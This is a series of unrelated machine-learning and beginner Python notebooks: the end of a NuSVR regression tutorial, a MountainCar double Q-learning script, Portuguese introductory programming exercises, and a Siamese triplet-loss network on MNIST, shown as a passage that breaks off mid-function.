x=X.columns.to_list()
for i in x:
X[i]=NullClearner(X[i])
Y=NullClearner(Y)
X=EncodeX(X)
X.head()
```
#### Correlation Map
In order to check the correlation between the features, we will plot a correlation matrix. It is effective in summarizing a large amount of data where the goal is to see patterns.
```
f,ax = plt.subplots(figsize=(18, 18))
matrix = np.triu(X.corr())
se.heatmap(X.corr(), annot=True, linewidths=.5, fmt= '.1f',ax=ax, mask=matrix)
plt.show()
```
### Data Splitting
The train-test split is a procedure for evaluating the performance of an algorithm. The procedure involves taking a dataset and dividing it into two subsets. The first subset is utilized to fit/train the model. The second subset is used for prediction. The main motive is to estimate the performance of the model on new data.
```
X_train,X_test,y_train,y_test=train_test_split(X,Y,test_size=0.2,random_state=123)
```
### Model
Support vector machines (SVMs) are a set of supervised learning methods used for classification, regression and outliers detection.
A Support Vector Machine is a discriminative classifier formally defined by a separating hyperplane. In other terms, for a given known/labelled data points, the SVM outputs an appropriate hyperplane that classifies the inputted new cases based on the hyperplane. In 2-Dimensional space, this hyperplane is a line separating a plane into two segments where each class or group occupied on either side.
Here we will use NuSVR, the NuSVR implementation is based on libsvm. Similar to NuSVC, for regression, uses a parameter nu to control the number of support vectors. However, unlike NuSVC, where nu replaces C, here nu replaces the parameter epsilon of epsilon-SVR.
#### Model Tuning Parameters
1. nu : float, default=0.5
> An upper bound on the fraction of training errors and a lower bound of the fraction of support vectors. Should be in the interval (0, 1]. By default 0.5 will be taken.
2. C : float, default=1.0
> Regularization parameter. The strength of the regularization is inversely proportional to C. Must be strictly positive. The penalty is a squared l2 penalty.
3. kernel : {‘linear’, ‘poly’, ‘rbf’, ‘sigmoid’, ‘precomputed’}, default=’rbf’
> Specifies the kernel type to be used in the algorithm. It must be one of ‘linear’, ‘poly’, ‘rbf’, ‘sigmoid’, ‘precomputed’ or a callable. If none is given, ‘rbf’ will be used. If a callable is given it is used to pre-compute the kernel matrix from data matrices; that matrix should be an array of shape (n_samples, n_samples).
4. gamma : {‘scale’, ‘auto’} or float, default=’scale’
> Gamma is a hyperparameter that we have to set before the training model. Gamma decides how much curvature we want in a decision boundary.
5. degree : int, default=3
> Degree of the polynomial kernel function (‘poly’). Ignored by all other kernels.Using degree 1 is similar to using a linear kernel. Also, increasing degree parameter leads to higher training times.
#### Rescaling technique
Standardize features by removing the mean and scaling to unit variance
The standard score of a sample x is calculated as:
z = (x - u) / s
where u is the mean of the training samples or zero if with_mean=False, and s is the standard deviation of the training samples or one if with_std=False.
#### Feature Transformation
Transform features using quantiles information.
This method transforms the features to follow a uniform or a normal distribution. Therefore, for a given feature, this transformation tends to spread out the most frequent values. It also reduces the impact of (marginal) outliers: this is therefore a robust preprocessing scheme.The transformation is applied on each feature independently.
```
model=make_pipeline(StandardScaler(),QuantileTransformer(),NuSVR())
model.fit(X_train,y_train)
```
#### Model Accuracy
We will use the trained model to make a prediction on the test set.Then use the predicted value for measuring the accuracy of our model.
> **score**: The **score** function returns the coefficient of determination <code>R<sup>2</sup></code> of the prediction.
```
print("Accuracy score {:.2f} %\n".format(model.score(X_test,y_test)*100))
```
> **r2_score**: The **r2_score** function computes the percentage variablility explained by our model, either the fraction or the count of correct predictions.
> **mae**: The **mean abosolute error** function calculates the amount of total error(absolute average distance between the real data and the predicted data) by our model.
> **mse**: The **mean squared error** function squares the error(penalizes the model for large errors) by our model.
```
y_pred=model.predict(X_test)
print("R2 Score: {:.2f} %".format(r2_score(y_test,y_pred)*100))
print("Mean Absolute Error {:.2f}".format(mean_absolute_error(y_test,y_pred)))
print("Mean Squared Error {:.2f}".format(mean_squared_error(y_test,y_pred)))
```
#### Prediction Plot
First, we make use of a scatter plot to plot the actual observations, with x_train on the x-axis and y_train on the y-axis.
For the regression line, we will use x_train on the x-axis and then the predictions of the x_train observations on the y-axis.
```
plt.figure(figsize=(14,10))
plt.plot(range(20),y_test[0:20], color = "green")
plt.plot(range(20),model.predict(X_test[0:20]), color = "red")
plt.legend(["Actual", "prediction"])
plt.title("Predicted vs True Value")
plt.xlabel("Record number")
plt.ylabel(target)
plt.show()
```
#### Creator: Vamsi Mukkamala , Github: [Profile](https://github.com/vmc99)
|
github_jupyter
|
```
import gym
import numpy as np
import matplotlib.pyplot as plt
import sys
env = gym.make('MountainCar-v0')
LEARNING_RATE = 0.1
NUM_EPISODES = 500
DISCOUNT_FACTOR = 0.95
DISCRETE_OS_SIZE = [20] * len(env.observation_space.high)
discrete_os_win_size = (env.observation_space.high-env.observation_space.low)/DISCRETE_OS_SIZE[0]
#q_table = np.random.uniform(low=-2, high=0, size=(DISCRETE_OS_SIZE+[env.action_space.n]))
q_table_1 = np.random.uniform(low=-2, high=0, size=(DISCRETE_OS_SIZE+[env.action_space.n]))
q_table_2 = np.random.uniform(low=-2, high=0, size=(DISCRETE_OS_SIZE+[env.action_space.n]))
def get_discrete_state(state):
discrete_state = (state-env.observation_space.low)/discrete_os_win_size
return tuple(discrete_state.astype(np.int))
def make_epsilon_greedy_policy(epsilon, q_table_1, q_table_2):
def policy_fn(state):
q_table_avg = {}
for i in range(20):
for j in range(20):
q_table_avg[(i,j)] = (q_table_1[(i,j)] + q_table_2[(i,j)])/2
actions = q_table_avg[state]
A = np.ones(len(actions), dtype=float) * (epsilon / len(actions))
best_action = np.argmax(actions)
A[best_action] += 1 - epsilon
return A
return policy_fn
policy = make_epsilon_greedy_policy(0.05, q_table_1, q_table_2)
episode_lengths = [0] * NUM_EPISODES
episode_rewards = [0] * NUM_EPISODES
for i_episode in range(NUM_EPISODES):
state = env.reset()
done = False
if (i_episode+1) % 100 == 0:
print('\r', i_episode+1, end='')
sys.stdout.flush()
while not done:
#if i_episode % 100 == 0:
# env.render()
discrete_state = get_discrete_state(state)
action_probs = policy(discrete_state)
action = np.random.choice(np.arange(len(action_probs)), p=action_probs)
next_state, reward, done, _ = env.step(action)
episode_lengths[i_episode] += 1
episode_rewards[i_episode] += reward
if not done:
discrete_next_state = get_discrete_state(next_state)
if np.random.random() > 0.5:
best_next_q_value = q_table_2[discrete_next_state][np.argmax(q_table_1[discrete_next_state])]
target = reward + DISCOUNT_FACTOR * best_next_q_value
q_table_1[discrete_state][action] += LEARNING_RATE * (target - q_table_1[discrete_state][action])
else:
best_next_q_value = q_table_1[discrete_next_state][np.argmax(q_table_2[discrete_next_state])]
target = reward + DISCOUNT_FACTOR * best_next_q_value
q_table_2[discrete_state][action] += LEARNING_RATE * (target - q_table_2[discrete_state][action])
elif next_state[0] >= env.goal_position:
q_table_1[discrete_state][action] = 0
q_table_2[discrete_state][action] = 0
state = next_state
# Use this with the trainining function from DQN-file
class QAgent:
def __init__(self, env):
self.epsilon = 0.5
self.epsilon_max = 0.5
self.epsilon_min = 0.1
self.epsilon_decay = (self.epsilon_max - self.epsilon_min) / 1000
self.discount_factor = 0.95
self.learning_rate = 0.1
self.state_size = len(env.observation_space.high)
self.action_size = env.action_space.n
self.discrete_table_size = 20
self.q_table = self.build_model()
def build_model(self):
table_size = [self.discrete_table_size] * self.state_size
q_table = np.random.uniform(low=-2, high=0, size=(table_size+[self.action_size]))
return q_table
def get_discrete_state(self, state):
normalized_state = (state - env.observation_space.low) / (env.observation_space.high - env.observation_space.low)
rescaled_state = normalized_state * self.discrete_table_size
return tuple(rescaled_state.astype(np.int))
def act(self, state):
if self.epsilon_max >= self.epsilon >= self.epsilon_min:
self.epsilon -= self.epsilon_decay
discrete_state = self.get_discrete_state(state)
if np.random.random() > self.epsilon:
q_values = self.q_table[discrete_state]
return np.argmax(q_values)
else:
return np.random.choice(np.arange(self.action_size))
def update(self, state, action, reward, next_state, done):
discrete_state = self.get_discrete_state(state)
if next_state[0] >= env.goal_position:
self.q_table[discrete_state][action] = 0
else:
discrete_next_state = self.get_discrete_state(next_state)
best_next_q_value = np.max(self.q_table[discrete_next_state])
target = reward + self.discount_factor * best_next_q_value
self.q_table[discrete_state][action] += self.learning_rate * (target - self.q_table[discrete_state][action])
x_double = np.convolve(episode_rewards, np.ones((20,))/20, mode='valid')
fig = plt.plot(x_double)
plt.show()
x = np.convolve(episode_rewards, np.ones((20,))/20, mode='valid')
fig = plt.plot(x)
plt.show()
fig = plt.figure()
ax = plt.axes(projection='3d')
x = np.arange(20)
y = np.arange(20)
X, Y = np.meshgrid(x, y)
ax.plot_wireframe(X, Y, q_table, color='green')
plt.show()
q_table_avg = {}
for i in range(20):
for j in range(20):
q_table_avg[(i,j)] = (q_table_1[(i,j)] + q_table_2[(i,j)])/2
q_table_avg
```
|
github_jupyter
|
## Exercício 01
### Linguagens e Paradigmas de Programação
Janaina Emilia
<br /> <b>RA</b> 816114781
1- Faça um Programa que peça o raio de um círculo, calcule e
mostre sua área.
```
import math
raio = float(input("Digite o valor do raio:"))
area = math.pi * (raio ** 2)
print("A área do circulo é: ", area)
```
2- Faça um Programa que calcule a área de um quadrado, em
seguida mostre o dobro desta área para o usuário.
```
base = float(input("Digite o valor da base:"))
altura = float(input("Digite o valor da altura:"))
area = (base * altura)
print("O dobro da área do quadrado é: ", area*2)
```
3- Faça um Programa que pergunte quanto você ganha por hora e o
número de horas trabalhadas no mês. Calcule e mostre o total do
seu salário no referido mês.
```
valor_hora = float(input("Quanto você ganha por hora?"))
horas_mes = float(input("Quantas horas você trabalha por mês?"))
salario = valor_hora * horas_mes
print("Seu salário mensal é: ", salario)
```
4- Faça um Programa que peça a temperatura em graus Farenheit,
transforme e mostre a temperatura em graus Celsius. C = (5 * (F-
328 / 98.
```
temperatura_f = float(input("Digite uma temperatura em Farenheit:"))
temperatura_c = (5 * (temperatura_f - 32)) / 9
print("A temperatura em Celcius é: ", temperatura_c)
```
5- Faça um Programa que peça a temperatura em graus Celsius,
transforme e mostre em graus Farenheit.
```
temperatura_c = float(input("Digite uma temperatura em Celsius:"))
temperatura_f = ((temperatura_c / 5) * 9) + 32
print("A temperatura em Farenheit é: ", temperatura_f)
```
6- Faça um Programa que peça 2 números inteiros e um número
real. Calcule e mostre:
- o produto do dobro do primeiro com metade do segundo .
- a soma do triplo do primeiro com o terceiro.
- o terceiro elevado ao cubo.
```
a = int(input("Digite o valor de A:"))
b = int(input("Digite o valor de B:"))
c = float(input("Digite o valor de C:"))
print("O produto do dobro do primeiro com metade do segundo:", (a * 2) * (b / 2))
print("A soma do triplo do primeiro com o terceiro", (a * 3) + c)
print("O terceiro elevado ao cubo", c ** 3)
```
7- João Papo-de-Pescador, homem de bem, comprou um microcomputador para controlar o rendimento diário de seu trabalho. Toda vez que ele traz um peso de peixes maior que o estabelecido pelo regulamento de pesca do estado de São Paulo (50 quilos) deve pagar uma multa de R$ 4,00 por quilo excedente. João precisa que você faça um programa que leia a variável peso (peso de peixes) e verifque se há excesso. Se houver, gravar na variável excesso e na variável multa o valor da multa que João deverá pagar.
Caso contrário mostrar tais variáveis com o conteúdo ZERO.
```
peso = float(input("Informe o peso:"))
excesso = 0
multa = 0
if(peso > 50):
excesso = peso - 50
gramas = excesso - int(excesso)
multa = excesso * 4
print("Peso excedido: ", excesso)
print("Valor da multa: ", multa)
```
8- Faça um Programa que pergunte quanto você ganha por hora e o
número de horas trabalhadas no mês. Calcule e mostre o total do
seu salário no referido mês, sabendo-se que são descontados 11%
para o Imposto de Renda, 8% para o INSS e 5% para o sindicato,
faça um programa que nos dê:
- salário bruto.
- quanto pagou ao INSS.
- quanto pagou ao sindicato.
- o salário líquido.
- calcule os descontos e o salário líquido, conforme a tabela abaixo
+Salário Bruto:R$
-IR (11%):R$
-INSS (8%):R$
-Sindicato (5):R$
=Salário Liquido:R$
Obs.: Salário Bruto - Descontos = Salário Líquido.
```
valor_hora = float(input("Quanto você ganha por hora?"))
horas_mes = float(input("Quantas horas você trabalha por mês?"))
salario_bruto = valor_hora * horas_mes
imposto_de_renda = salario_bruto * 0.11
inss = salario_bruto * 0.08
sindicato = salario_bruto * 0.05
salario_liquido = salario_bruto - (imposto_de_renda + inss + sindicato)
print("Seu salário bruto mensal é: ", salario_bruto)
print("Valor do Imposto de Renda: ", imposto_de_renda)
print("Valor do INSS: ", inss)
print("Valor do Sindicato: ", sindicato)
print("Seu salário liquido mensal é: ", salario_liquido)
```
9- Faça um programa que leia 2 strings e informe o conteúdo delas
seguido do seu comprimento. Informe também se as duas strings
possuem o mesmo comprimento e são iguais ou diferentes no
conteúdo.
Exemplo:
String 1: Brasil Hexa 2018
String 2: Brasil! Hexa 2018!
Tamanho de "Brasil Hexa 2018": 16 caracteres
Tamanho de "Brasil! Hexa 2018!": 18 caracteres
As duas strings são de tamanhos diferentes.
As duas strings possuem conteúdo diferente.
```
string_a = input("Digite a primeira frase: ")
string_b = input("Digite a segunda frase: ")
print("String 1: ", string_a)
print("String 2: ", string_b)
print("Tamanho de " + string_a + ": ", len(string_a))
print("Tamanho de " + string_b + ": ", len(string_b))
if(len(string_a) == len(string_b)):
print("As duas strings tem o mesmo tamanho.")
else:
print("As duas strings tem tamanho diferente.")
if(string_a == string_b):
print("As duas strings possuem o mesmo conteúdo.")
else:
print("As duas strings possuem conteúdo diferente.")
```
10- Faça um programa que permita ao usuário digitar o seu nome e
em seguida mostre o nome do usuário de trás para frente utilizando
somente letras maiúsculas. Dica: lembre−se que ao informar o
nome o usuário pode digitar letras maiúsculas ou minúsculas.
Observação: não use loops.
```
username = input("Digite seu nome:")
print(username[::-1].upper())
```
11- Faça um programa que solicite a data de nascimento
(dd/mm/aaaa) do usuário e imprima a data com o nome do mês por
extenso.
Data de Nascimento: 29/10/1973
Você nasceu em 29 de Outubro de 1973.
Obs.: Não use desvio condicional nem loops.
```
import locale
from datetime import date
locale.setlocale(locale.LC_TIME, 'portuguese_brazil')
data_nascimento = input("Informe a data de nascimento: (dd/mm/aa)").split("/")
data = date(day=int(data_nascimento[0]), month=int(data_nascimento[1]), year=int(data_nascimento[2]))
str = data.strftime('%A %d de %B de %Y')
print("Você nasceu em", str)
```
12- Leet é uma forma de se escrever o alfabeto latino usando outros
símbolos em lugar das letras, como números por exemplo. A própria
palavra leet admite muitas variações, como l33t ou 1337. O uso do
leet reflete uma subcultura relacionada ao mundo dos jogos de
computador e internet, sendo muito usada para confundir os
iniciantes e afrmar-se como parte de um grupo. Pesquise sobre as
principais formas de traduzir as letras. Depois, faça um programa
que peça uma texto e transforme-o para a grafa leet speak.
Desafo: não use loops nem desvios condicionais.
```
string = input("Digite um texto qualquer: ")
translation = {"a": "4", "A": "4", "e": "3", "E": "3", "i": "1", "I": "1", "o": "0", "O": "0", "t": "7", "T": "7", "s": '5', "S": '5'}
string = string.translate(str.maketrans(translation))
print(string)
```
|
github_jupyter
|
# Siamese Neural Network with Triplet Loss trained on MNIST
## Cameron Trotter
### c.trotter2@ncl.ac.uk
This notebook builds an SNN to determine similarity scores between MNIST digits using a triplet loss function. The use of class prototypes at inference time is also explored.
This notebook is based heavily on the approach described in [this Coursera course](https://www.coursera.org/learn/siamese-network-triplet-loss-keras/), which in turn is based on the [FaceNet](https://arxiv.org/abs/1503.03832) paper. Any uses of open-source code are linked throughout where utilised.
For an in-depth guide to understand this code, and the theory behind it, please see LINK.
### Imports
```
# TF 1.14 gives lots of warnings for deprecations ready for the switch to TF 2.0
import warnings
warnings.filterwarnings('ignore')
import tensorflow as tf
import matplotlib.pyplot as plt
import numpy as np
import random
import os
import glob
from datetime import datetime
from tensorflow.keras.models import model_from_json
from tensorflow.keras.callbacks import Callback, CSVLogger, ModelCheckpoint
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.layers import Activation, Input, concatenate
from tensorflow.keras.layers import Layer, BatchNormalization, MaxPooling2D, Concatenate, Lambda, Flatten, Dense
from tensorflow.keras.initializers import glorot_uniform, he_uniform
from tensorflow.keras.regularizers import l2
from tensorflow.keras.utils import multi_gpu_model
from sklearn.decomposition import PCA
from sklearn.metrics import roc_curve, roc_auc_score
import math
from pylab import dist
import json
from tensorflow.python.client import device_lib
import matplotlib.gridspec as gridspec
```
## Import the data and reshape for use with the SNN
The data loaded in must be in the same format as `tf.keras.datasets.mnist.load_data()`, that is `(x_train, y_train), (x_test, y_test)`
```
(x_train, y_train), (x_test, y_test) = tf.keras.datasets.mnist.load_data()
num_classes = len(np.unique(y_train))
x_train_w = x_train.shape[1] # (60000, 28, 28)
x_train_h = x_train.shape[2]
x_test_w = x_test.shape[1]
x_test_h = x_test.shape[2]
x_train_w_h = x_train_w * x_train_h # 28 * 28 = 784
x_test_w_h = x_test_w * x_test_h
x_train = np.reshape(x_train, (x_train.shape[0], x_train_w_h))/255. # (60000, 784)
x_test = np.reshape(x_test, (x_test.shape[0], x_test_w_h))/255.
```
### Plotting the triplets
```
def plot_triplets(examples):
plt.figure(figsize=(6, 2))
for i in range(3):
plt.subplot(1, 3, 1 + i)
plt.imshow(np.reshape(examples[i], (x_train_w, x_train_h)), cmap='binary')
plt.xticks([])
plt.yticks([])
plt.show()
plot_triplets([x_train[0], x_train[1], x_train[2]])
```
### Create triplet batches
Random batches are generated by `create_batch`. Semi-hard triplet batches are generated by `create_batch_hard`.
Semi-Hard: dist(A, P) < dist(A, N) < dist(A, P) + margin. Using only easy triplets will lead to no learning. Hard triplets generate high loss and have high impact on training parameters, but may cause any mislabelled data to cause too much of a weight change.
```
def create_batch(batch_size=256, split = "train"):
x_anchors = np.zeros((batch_size, x_train_w_h))
x_positives = np.zeros((batch_size, x_train_w_h))
x_negatives = np.zeros((batch_size, x_train_w_h))
if split =="train":
data = x_train
data_y = y_train
else:
data = x_test
data_y = y_test
for i in range(0, batch_size):
# We need to find an anchor, a positive example and a negative example
random_index = random.randint(0, data.shape[0] - 1)
x_anchor = data[random_index]
y = data_y[random_index]
indices_for_pos = np.squeeze(np.where(data_y == y))
indices_for_neg = np.squeeze(np.where(data_y != y))
x_positive = data[indices_for_pos[random.randint(0, len(indices_for_pos) - 1)]]
x_negative = data[indices_for_neg[random.randint(0, len(indices_for_neg) - 1)]]
x_anchors[i] = x_anchor
x_positives[i] = x_positive
x_negatives[i] = x_negative
return [x_anchors, x_positives, x_negatives]
def create_hard_batch(batch_size, num_hard, split = "train"):
x_anchors = np.zeros((batch_size, x_train_w_h))
x_positives = np.zeros((batch_size, x_train_w_h))
x_negatives = np.zeros((batch_size, x_train_w_h))
if split =="train":
data = x_train
data_y = y_train
else:
data = x_test
data_y = y_test
# Generate num_hard number of hard examples:
hard_batches = []
batch_losses = []
rand_batches = []
# Get some random batches
for i in range(0, batch_size):
hard_batches.append(create_batch(1, split))
A_emb = embedding_model.predict(hard_batches[i][0])
P_emb = embedding_model.predict(hard_batches[i][1])
N_emb = embedding_model.predict(hard_batches[i][2])
# Compute d(A, P) - d(A, N) for each selected batch
batch_losses.append(np.sum(np.square(A_emb-P_emb),axis=1) - np.sum(np.square(A_emb-N_emb),axis=1))
# Sort batch_loss by distance, highest first, and keep num_hard of them
hard_batch_selections = [x for _, x in sorted(zip(batch_losses,hard_batches), key=lambda x: x[0])]
hard_batches = hard_batch_selections[:num_hard]
# Get batch_size - num_hard number of random examples
num_rand = batch_size - num_hard
for i in range(0, num_rand):
rand_batch = create_batch(1, split)
rand_batches.append(rand_batch)
selections = hard_batches + rand_batches
for i in range(0, len(selections)):
x_anchors[i] = selections[i][0]
x_positives[i] = selections[i][1]
x_negatives[i] = selections[i][2]
return [x_anchors, x_positives, x_negatives]
```
### Create the Embedding Model
This model takes in input image and generates some `emb_size`-dimensional embedding for the image, plotted on some latent space.
The untrained model's embedding space is stored for later use when comparing clustering between the untrained and the trained model using PCA, based on [this notebook](https://github.com/AdrianUng/keras-triplet-loss-mnist/blob/master/Triplet_loss_KERAS_semi_hard_from_TF.ipynb).
```
def create_embedding_model(emb_size):
embedding_model = tf.keras.models.Sequential([
Dense(4096,
activation='relu',
kernel_regularizer=l2(1e-3),
kernel_initializer='he_uniform',
input_shape=(x_train_w_h,)),
Dense(emb_size,
activation=None,
kernel_regularizer=l2(1e-3),
kernel_initializer='he_uniform')
])
embedding_model.summary()
return embedding_model
```
### Create the SNN
This model takes a triplet image input, passes them to the embedding model for embedding, then concats them together for the loss function
```
def create_SNN(embedding_model):
input_anchor = tf.keras.layers.Input(shape=(x_train_w_h,))
input_positive = tf.keras.layers.Input(shape=(x_train_w_h,))
input_negative = tf.keras.layers.Input(shape=(x_train_w_h,))
embedding_anchor = embedding_model(input_anchor)
embedding_positive = embedding_model(input_positive)
embedding_negative = embedding_model(input_negative)
output = tf.keras.layers.concatenate([embedding_anchor, embedding_positive,
embedding_negative], axis=1)
siamese_net = tf.keras.models.Model([input_anchor, input_positive, input_negative],
output)
siamese_net.summary()
return siamese_net
```
### Create the Triplet Loss Function
```
def triplet_loss(y_true, y_pred):
anchor, positive, negative = y_pred[:,:emb_size], y_pred[:,emb_size:2*emb_size],y_pred[:,2*emb_size:]
positive_dist = tf.reduce_mean(tf.square(anchor - positive), axis=1)
negative_dist = tf.reduce_mean(tf.square(anchor - negative), axis=1)
return tf.maximum(positive_dist - negative_dist + alpha, 0.)
```
### Data Generator
This function creates hard batches for the network to train on. `y` is required by TF but not by our model, so just return a filler to keep TF happy.
```
def data_generator(batch_size=256, num_hard=50, split="train"):
while True:
x = create_hard_batch(batch_size, num_hard, split)
y = np.zeros((batch_size, 3*emb_size))
yield x, y
```
### Evaluation
Allows for the model's metrics to be visualised and evaluated. Based on [this Medium post](https://medium.com/@crimy/one-shot-learning-siamese-networks-and-triplet-loss-with-keras-2885ed022352) and [this GitHub notebook](https://github.com/asagar60/One-Shot-Learning/blob/master/Omniglot_data/One_shot_implementation.ipynb).
```
def compute_dist(a,b):
return np.linalg.norm(a-b)
def compute_probs(network,X,Y):
'''
Input
network : current NN to compute embeddings
X : tensor of shape (m,w,h,1) containing pics to evaluate
Y : tensor of shape (m,) containing true class
Returns
probs : array of shape (m,m) containing distances
'''
m = X.shape[0]
nbevaluation = int(m*(m-1)/2)
probs = np.zeros((nbevaluation))
y = np.zeros((nbevaluation))
#Compute all embeddings for all imgs with current embedding network
embeddings = embedding_model.predict(X)
k = 0
# For each img in the evaluation set
for i in range(m):
# Against all other images
for j in range(i+1,m):
# compute the probability of being the right decision : it should be 1 for right class, 0 for all other classes
probs[k] = -compute_dist(embeddings[i,:],embeddings[j,:])
if (Y[i]==Y[j]):
y[k] = 1
#print("{3}:{0} vs {1} : \t\t\t{2}\tSAME".format(i,j,probs[k],k, Y[i], Y[j]))
else:
y[k] = 0
#print("{3}:{0} vs {1} : {2}\tDIFF".format(i,j,probs[k],k, Y[i], Y[j]))
k += 1
return probs, y
def compute_metrics(probs,yprobs):
'''
Returns
fpr : Increasing false positive rates such that element i is the false positive rate of predictions with score >= thresholds[i]
tpr : Increasing true positive rates such that element i is the true positive rate of predictions with score >= thresholds[i].
thresholds : Decreasing thresholds on the decision function used to compute fpr and tpr. thresholds[0] represents no instances being predicted and is arbitrarily set to max(y_score) + 1
auc : Area Under the ROC Curve metric
'''
# calculate AUC
auc = roc_auc_score(yprobs, probs)
# calculate roc curve
fpr, tpr, thresholds = roc_curve(yprobs, probs)
return fpr, tpr, thresholds,auc
def draw_roc(fpr, tpr,thresholds, auc):
#find threshold
targetfpr=1e-3
_, idx = find_nearest(fpr,targetfpr)
threshold = thresholds[idx]
recall = tpr[idx]
# plot no skill
plt.plot([0, 1], [0, 1], linestyle='--')
# plot the roc curve for the model
plt.plot(fpr, tpr, marker='.')
plt.title('AUC: {0:.3f}\nSensitivity : {2:.1%} @FPR={1:.0e}\nThreshold={3})'.format(auc,targetfpr,recall,abs(threshold) ))
# show the plot
plt.show()
def find_nearest(array,value):
idx = np.searchsorted(array, value, side="left")
if idx > 0 and (idx == len(array) or math.fabs(value - array[idx-1]) < math.fabs(value - array[idx])):
return array[idx-1],idx-1
else:
return array[idx],idx
def draw_interdist(network, epochs):
interdist = compute_interdist(network)
data = []
for i in range(num_classes):
data.append(np.delete(interdist[i,:],[i]))
fig, ax = plt.subplots()
ax.set_title('Evaluating embeddings distance from each other after {0} epochs'.format(epochs))
ax.set_ylim([0,3])
plt.xlabel('Classes')
plt.ylabel('Distance')
ax.boxplot(data,showfliers=False,showbox=True)
locs, labels = plt.xticks()
plt.xticks(locs,np.arange(num_classes))
plt.show()
def compute_interdist(network):
'''
Computes sum of distances between all classes embeddings on our reference test image:
d(0,1) + d(0,2) + ... + d(0,9) + d(1,2) + d(1,3) + ... d(8,9)
A good model should have a large distance between all theses embeddings
Returns:
array of shape (num_classes,num_classes)
'''
res = np.zeros((num_classes,num_classes))
ref_images = np.zeros((num_classes, x_test_w_h))
#generates embeddings for reference images
for i in range(num_classes):
ref_images[i,:] = x_test[i]
ref_embeddings = network.predict(ref_images)
for i in range(num_classes):
for j in range(num_classes):
res[i,j] = dist(ref_embeddings[i],ref_embeddings[j])
return res
def DrawTestImage(network, images, refidx=0):
'''
Evaluate some pictures vs some samples in the test set
image must be of shape(1,w,h,c)
Returns
scores : result of the similarity scores with the basic images => (N)
'''
nbimages = images.shape[0]
#generates embedings for given images
image_embedings = network.predict(images)
#generates embedings for reference images
ref_images = np.zeros((num_classes,x_test_w_h))
for i in range(num_classes):
images_at_this_index_are_of_class_i = np.squeeze(np.where(y_test == i))
ref_images[i,:] = x_test[images_at_this_index_are_of_class_i[refidx]]
ref_embedings = network.predict(ref_images)
for i in range(nbimages):
# Prepare the figure
fig=plt.figure(figsize=(16,2))
subplot = fig.add_subplot(1,num_classes+1,1)
plt.axis("off")
plotidx = 2
# Draw this image
plt.imshow(np.reshape(images[i], (x_train_w, x_train_h)),vmin=0, vmax=1,cmap='Greys')
subplot.title.set_text("Test image")
for ref in range(num_classes):
#Compute distance between this images and references
dist = compute_dist(image_embedings[i,:],ref_embedings[ref,:])
#Draw
subplot = fig.add_subplot(1,num_classes+1,plotidx)
plt.axis("off")
plt.imshow(np.reshape(ref_images[ref, :], (x_train_w, x_train_h)),vmin=0, vmax=1,cmap='Greys')
subplot.title.set_text(("Class {0}\n{1:.3e}".format(ref,dist)))
plotidx += 1
def generate_prototypes(x_data, y_data, embedding_model):
classes = np.unique(y_data)
prototypes = {}
for c in classes:
#c = classes[0]
# Find all images of the chosen test class
locations_of_c = np.where(y_data == c)[0]
imgs_of_c = x_data[locations_of_c]
imgs_of_c_embeddings = embedding_model.predict(imgs_of_c)
# Get the median of the embeddings to generate a prototype for the class (reshaping for PCA)
prototype_for_c = np.median(imgs_of_c_embeddings, axis = 0).reshape(1, -1)
# Add it to the prototype dict
prototypes[c] = prototype_for_c
return prototypes
def test_one_shot_prototypes(network, sample_embeddings):
distances_from_img_to_test_against = []
# As the img to test against is in index 0, we compare distances between img@0 and all others
for i in range(1, len(sample_embeddings)):
distances_from_img_to_test_against.append(compute_dist(sample_embeddings[0], sample_embeddings[i]))
# As the correct img will be at distances_from_img_to_test_against index 0 (sample_imgs index 1),
# If the smallest distance in distances_from_img_to_test_against is at index 0,
# we know the one shot test got the right answer
is_min = distances_from_img_to_test_against[0] == min(distances_from_img_to_test_against)
is_max = distances_from_img_to_test_against[0] == max(distances_from_img_to_test_against)
return int(is_min and not is_max)
def n_way_accuracy_prototypes(n_val, n_way, network):
num_correct = 0
for val_step in range(n_val):
num_correct += load_one_shot_test_batch_prototypes(n_way, network)
accuracy = num_correct / n_val * 100
return accuracy
def load_one_shot_test_batch_prototypes(n_way, network):
labels = np.unique(y_test)
# Reduce the label set down from size n_classes to n_samples
labels = np.random.choice(labels, size = n_way, replace = False)
# Choose a class as the test image
label = random.choice(labels)
# Find all images of the chosen test class
imgs_of_label = np.where(y_test == label)[0]
# Randomly select a test image of the selected class, return it's index
img_of_label_idx = random.choice(imgs_of_label)
# Expand the array at the selected indexes into useable images
img_of_label = np.expand_dims(x_test[img_of_label_idx],axis=0)
sample_embeddings = []
# Get the anchor image embedding
anchor_prototype = network.predict(img_of_label)
sample_embeddings.append(anchor_prototype)
# Get the prototype embedding for the positive class
positive_prototype = prototypes[label]
sample_embeddings.append(positive_prototype)
# Get the negative prototype embeddings
# Remove the selected test class from the list of labels based on it's index
label_idx_in_labels = np.where(labels == label)[0]
other_labels = np.delete(labels, label_idx_in_labels)
# Get the embedding for each of the remaining negatives
for other_label in other_labels:
negative_prototype = prototypes[other_label]
sample_embeddings.append(negative_prototype)
correct = test_one_shot_prototypes(network, sample_embeddings)
return correct
def visualise_n_way_prototypes(n_samples, network):
labels = np.unique(y_test)
# Reduce the label set down from size n_classes to n_samples
labels = np.random.choice(labels, size = n_samples, replace = False)
# Choose a class as the test image
label = random.choice(labels)
# Find all images of the chosen test class
imgs_of_label = np.where(y_test == label)[0]
# Randomly select a test image of the selected class, return it's index
img_of_label_idx = random.choice(imgs_of_label)
# Get another image idx that we know is of the test class for the sample set
label_sample_img_idx = random.choice(imgs_of_label)
# Expand the array at the selected indexes into useable images
img_of_label = np.expand_dims(x_test[img_of_label_idx],axis=0)
label_sample_img = np.expand_dims(x_test[label_sample_img_idx],axis=0)
# Make the first img in the sample set the chosen test image, the second the other image
sample_imgs = np.empty((0, x_test_w_h))
sample_imgs = np.append(sample_imgs, img_of_label, axis=0)
sample_imgs = np.append(sample_imgs, label_sample_img, axis=0)
sample_embeddings = []
# Get the anchor embedding image
anchor_prototype = network.predict(img_of_label)
sample_embeddings.append(anchor_prototype)
# Get the prototype embedding for the positive class
positive_prototype = prototypes[label]
sample_embeddings.append(positive_prototype)
# Get the negative prototype embeddings
# Remove the selected test class from the list of labels based on it's index
label_idx_in_labels = np.where(labels == label)[0]
other_labels = np.delete(labels, label_idx_in_labels)
# Get the embedding for each of the remaining negatives
for other_label in other_labels:
negative_prototype = prototypes[other_label]
sample_embeddings.append(negative_prototype)
# Find all images of the other class
imgs_of_other_label = np.where(y_test == other_label)[0]
# Randomly select an image of the selected class, return it's index
another_sample_img_idx = random.choice(imgs_of_other_label)
